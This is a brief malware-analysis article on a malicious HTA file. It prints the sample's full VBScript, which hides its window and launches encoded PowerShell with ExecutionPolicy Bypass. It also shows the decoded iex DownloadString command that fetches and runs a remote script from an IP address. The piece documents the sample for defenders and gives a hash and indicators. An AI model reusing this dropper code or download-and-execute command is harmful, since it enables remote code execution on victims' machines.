Analysis Malicious HTA Dropper .

 

In this article we will discuss how to analyze an HTA file. You drop and download a PowerShell file and we start analyzing it.

Sample SHA-256 : ef985d6f8548cfe1c0055087c8c1fb1ea0a8a29ad64bc6e8fd8d318193e5ee97

Below is the entire malicious code to understand :

<HTML>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<HEAD>

<script language="VBScript">

        Window.ReSizeTo 0, 0

        Window.moveTo -2000,-2000

        Function var_func()

                Dim var_shell

                Set var_shell = CreateObject("Wscript.Shell")

                var_shell.run "cmd /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -e aQBlAHgAIAAoACgATgBlAHcALQBPAGI", 0, true

        End Function

        var_func

</script>

<body>

</body>

</HEAD>

</HTML>

Code Indicator :

1- <script language="VBScript">

2- Set var_shell = CreateObject("Wscript.Shell")

3-   var_shell.run "cmd /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -e

From this code indicator, the attacker uses it to interact with PowerShell and then execute Base64-encoded PowerShell code.

Let's use CyberChef to decode:

Decoded Malicious Powershell code :

iex ((New-Object System.Net.WebClient).DownloadString('http[://]185[.216.]68.35/win/[checking].ps1')).

In this code we have decoded, it will download a PowerShell file.